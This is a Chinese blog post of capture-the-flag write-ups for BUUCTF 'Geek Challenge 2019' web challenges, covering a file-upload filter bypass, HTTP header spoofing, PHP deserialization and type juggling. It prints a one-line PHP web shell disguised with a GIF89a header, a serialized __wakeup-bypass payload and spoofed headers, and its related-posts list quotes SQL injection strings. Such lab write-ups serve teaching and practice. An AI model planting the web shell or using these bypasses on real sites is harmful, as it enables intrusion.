Buuctf—极客大挑战练习

最新推荐文章于 2024-04-17 23:20:06 发布
最新推荐文章于 2024-04-17 23:20:06 发布
阅读量460 收藏
点赞数
分类专栏: Web安全-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/119333285
版权

文章目录

[极客大挑战 2019]Knife 1

白给的shell
在这里插入图片描述
一句话木马
直接蚁剑或者菜刀连接
在这里插入图片描述
在根目录下得到flag
在这里插入图片描述

[极客大挑战 2019]Http 1

打开环境查看源码发现Secret.php
在这里插入图片描述
访问一下:
在这里插入图片描述
也就是这个网页不是来自https://www.Sycsecret.com的
抓包,添加referer头,referer头就是证明你从哪里点进来的。
在这里插入图片描述
又提示请使用Syclover这个浏览器
修改:
在这里插入图片描述

需要我们从本地打开?

这里就要用到X-Forwarded-For这个扩展头

X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由Squid
这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大
HTTP代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。

X-Forwarded-For:127.0.0.1
或者X-Forwarded-For:localhost
在这里插入图片描述

[极客大挑战 2019]Upload 1

上传php文件,报错了

在这里插入图片描述
抓包修改文件类型:
在这里插入图片描述

放包发现过滤了php:
在这里插入图片描述
经过测试php,php3,php4,php5都被过滤了
将后缀修改为phtml试一下:
还是报错了,但并不是后缀报错了,不能含有<?
测试一下过滤了那些东西

修改一句话木马:
我们尝试一下在文件头添加一个GIF89a?

GIF89a? <script language="php">eval($_REQUEST[WWW])</script>

在这里插入图片描述

在这里插入图片描述
上传成功!蚁剑连接:
在这里插入图片描述
可以在根目录下得到flag

[极客大挑战 2019]PHP 1

在这里插入图片描述
网站备份!!!
我们用御剑扫:
有一个压缩包:www.zip,打开index.php:
发现传参方式:
在这里插入图片描述
class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

存在魔法函数__wakeup()和 __destruct()
我们先来看如何绕过 __destruct():

   function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
          if ($this->username === 'admin') {
            global $flag;
            echo $flag;

username===‘admin’,passwqord=100即可!!

_wakeup()函数是在执行unserialize()函数的时候,会被调用
执行后变量username的值将变成guest,当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行

在class.php后加上这样几句代码:


$a = new Name('admin',100);
$s = serialize($a);
echo $s;

由于private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。其中 \0 字符也是计算长度的。
在这里插入图片描述
$username$password均为私有变量

输出结果:
在这里插入图片描述
经过尝试\0并不可行

而使用%00的目的就是用于替代\0 :

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

将表示属性个数的数字修改为3就可以绕过__wakeup()函数:
payload:

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

在这里插入图片描述
得到flag!

[极客大挑战 2019]BuyFlag 1

进入payflag界面:

在这里插入图片描述
抓包:
在这里插入图片描述
我们必须是一个Cuit’s student,修改user的值为1:
在这里插入图片描述
需要输入密码
在这里插入图片描述
password要等于404并且不能为数字,那么构造:password=404a
另外购买flag need your 100000000 money
我尝试之后,报错了,字符太长了,
那么用科学计数法:
payload:password=404a&money=1e10
成功:
在这里插入图片描述

Stray.io
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Secret File
weixin_46580614的博客
07-16 155
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
[挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 3099
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
[挑战 2024]web部分题解(已完结!),2024年冲刺年薪40w
最新发布
2401_84435000的博客
04-17 790
我们看到一句话木马,一句话木马本身是利用代码执行的函数进行运行,说的简单点就是你的post请求传入eval()中,那也就是说,我们可以修改Post请求的参数来执行代码!的这里我会讲解我理解下的内容,如果有兴趣的师傅建议去原文看一下,其中我真的很喜欢士别三日博的一句话,真的建议每一位Ctfer记住!oh,有检索过滤,那就难办了,我不会,完结撒。可以看到flag文件夹了,ctf有一个不成文的规矩就是要么不出flag字符,要么出现flag就在这里边!打开环境以后发现又可以逗猫,就偷偷玩了一小会儿。
【python】OCR
bryant_meng
12-16 3120
先看看百度百科对 OCR 的定义: OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;即,针对印刷体字符,采用光学的方式将纸质文档中的文字转换成为黑白点阵的图像文件,并通过识别软件将图像中的文字转换成文本格式,供文字处理软件进一步编辑加工的技术。如何除错或利用辅助信息提高识别正确率,是OCR最重要的课题,ICR(Intelligent C.
CTF Geek Challenge——第十一届挑战Crypto Write Up
无限迭代中......
11-18 1031
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
buuctf 挑战 babysql
SopRomeo的博客
01-17 1677
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
阿里云IoT创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 创新挑战赛》的分享,就挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 学院JAVA视频教程 新版 7大部分
seatgeek-frontend:座椅前端练习
05-29
在这个挑战中,您的任务是在我们的之后对名为 Chairnerd 的个人博实用程序进行一些开发工作。 我们主要考察您通过在现有框架中开发新功能来使用该框架的能力。 和主席一起玩 Chairnerd 是用 Webpack 构建的。 要...
web前端
07-22
教程名称:web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?...资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
BUUCTF:[挑战 2019]Knife
末初的CSDN博客
10-20 645
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 蚁剑连接,根目录发现flag
BUUCTF [挑战 2019] BabySQL
Senimo
03-25 3830
BUUCTF [挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
buuctf 挑战 finalsql
SopRomeo的博客
02-05 1499
说来话长,这边记录下,页面不一样了,之前的注入全部行不通,考虑到最烦最难得盲注,利用二分法查找是非常快的 这边记下playload 查库名:id=1^(ascii(substr((select(database())),1,1))>1)^1 库名为geek 查表名:id=1^(ascii(substr((select(group_concat(table_name))from(inform...
BUUCTF[挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4200
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF之[挑战 2019]EasySQL 1
weixin_44632787的博客
06-13 529
BUUCTF之[挑战 2019]EasySQL 1 开启靶机,看到我们的挑战界面 这个页面看起来就很像是SQL注入,而且我们的题目也有提示到。。。 OK,我们先输入一个万能密码看看~~~账号:1’ or 1=1 # 密码可以随便输入 好吧,这题过于简单。。。。。。 得到的Flag是:flag{f3bcaef4-f19b-4e56-bf4d-9780988e0b89} ...
web buuctf [挑战 2019]Secret File1
weixin_44214568的博客
08-05 286
1.点击靶机,查看到主页的源代码,源代码含有Archive_room.php;打开该文件,发现源代码中含有action.php,继续点开,界面提示
buuctf [挑战 2019]BuyFlag
qq_52671379的博客
05-09 1329
buuctf [挑战 2019]BuyFlag
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 864
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTF的Web题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
buuctf 挑战2019php
08-24
buuctf 挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值